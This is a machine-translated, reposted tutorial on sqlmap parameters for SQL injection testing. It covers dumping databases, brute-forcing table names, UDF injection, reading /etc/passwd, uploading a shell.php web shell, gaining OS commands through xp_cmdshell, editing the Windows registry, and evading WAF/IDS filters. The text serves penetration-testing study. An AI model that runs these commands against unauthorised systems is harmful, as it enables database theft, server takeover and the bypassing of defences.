Small white diary 46:kali penetration test Web Penetration-sqlmap automatic injection (iv)-SQLMAP parameter details-enumeration,brute force,udf injection,file system,os,windows Registry,general,miscellaneous

Source: Internet
Author: User
Tags microsoft access database

SQLMAP Automatic Injection

enumeration"Data Enumeration"

--privileges-u username "CU Current Account"

-D dvwa-t users-c user--columns "Specify database, table, column"

--exclude-sysdbs "Exclude libraries from the system layer"

*******************************************************************************

#查具体数据 " premise : The current database user has permission to read the INFORMATION_SCHEMA library"

--schema--batch--exclude-sysdbs Metadata "--batch: Batch processing, using default options, direct results"
--count "Count"
Dump Data
--dump,-C,-T,-D,--start,--stop
--dump-all--exclude-sysdbs

--sql-query "SELECT * from Users" premises: queried for tables and columns of the database; custom SQL query Statement "

******************************************************************************

BruteForce "when there is no access to information_schema, use brute power"

Notice

1, Mysql < 5.0, no INFORMATION_SCHEMA library
2, Mysql >= 5.0 but not authorized to read INFORMATION_SCHEMA library

3, using the Microsoft Access database, the default is not authorized to read msysobjects

--common-columns (acess system table no column information) "Defaults to the current column if no column is specified"

UDF injection"Custom parameter injection, belongs to advanced injection"

Compile the shared library to create and upload to DB Sever to generate the UDF for advanced injection

Upload file format: linux:shared object Windows:dll

File System "access to the filesystem"

--file-read= "/etc/passwd"
--file-write= "shell.php"--file-dest "/tmp/shell.php" "Injection file must be stored in the current directory, upload the target directory"

#默认stored in:. Sqlmap/output

OS "access to the operating system"

Linux systems: Mysql, PostgreSQL

Upload a shared library and generate Sys_exec (), Sys_eval () two UDFs

Windows system: Mssql

Use of Xp_cmdshel stored procedures (with the use, the ban on the start, not built)

--sql-shell "SQL Shell"

windows Registry "Windows system Registry Prerequisites: The current user has permission to operate on the registry"

--reg-read

--reg-add

--reg-del

--reg-key 、--reg-value 、--reg-data 、--reg-type

For example:sqlmap–u= "http://1.1.1.1/a.aspx?id=1"--reg-add--reg-key= "Hkey_local_machine\software\sqlmap"-- Reg-value=test--REG-TYPE=REG_SZ--reg-data=1

General "generic functions"

-S: Modify the SQLite session file save location

default :. sqlmap/output

-T: Modify record traffic file save location

default :. sqlmap/output

--charset: Force character encoding

--charset=gbk

--crawl: Specifies the crawl depth from the start location

--batch--crawl=3

--csv-del: Specify additional delimiters "dump data is stored by default ", "Split csv file"

--csv-del= ";"

--dbms-cred: Specify the Database Account " premise : Have the database management system account password"

# The data you've checked is stored in the session.

--flush-session: Empty Session "When we query the same site again, the query content is the previous saved session data"

--force-ssl: Querying for HTTPS websites

--fresh-queries: Ignore session query Results

--hex: Dump non-ASCII character contents in 16 binary (original data), after receiving decoding and restoring, just acting on the channel

Sqlmap-u "Http://<ip>/s.php?id=1"--HEX-V 3

--output-dir=/tmp "Specifying the directory for output data"

--parse-errors: Analysis and real-world database built-in error information to identify vulnerabilities

Sqlmap.py-u "Http://<id>/sqlmap/a.asp?id="--parse-errors

--save: Save command as configuration file, specify save location ""

Miscellaneous "Miscellaneous"

-Z: Parameter mnemonic "can be abbreviated, parameter is written as parameter set"

such as: Sqlmap--batch--random-agent--ignore-proxy--technique=beu-u "1.1.1.1/a.asp?id=1"

Sqlmap-z "Bat,random,ign,tec=beu"-U "1.1.1.1/a.asp?id=1"

--answer: Set parameters for different problems "similar to--batch"

Sqlmap-u "http://<ip>/a.php?id=1"--technique=e --anser= "Extending=n" --batch

--CHECK-WAF: Detection Waf/ips/ids

--hpp:http parameter Pollution "nature, a vulnerability on the Web"

An effective way to bypass Waf/ips/ids

Especially for Asp/iis and Asp.net/iis.

--IDENTITY-WAF: Thorough waf/ips/ids check "because some WAF filters only the first occurrence of username"

Support for more than 30 kinds of products

*************************************************************************

--mobile: Analog Smartphone devices

--purge-output: Clear the output folder

--smart: When there are a large number of detection targets, only error-based detection results are selected

--wizard: Wizard

Small white diary 46:kali penetration test Web Penetration-sqlmap automatic injection (iv)-SQLMAP parameter details-enumeration,brute force,udf injection,file system,os,windows Registry,general,miscellaneous

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.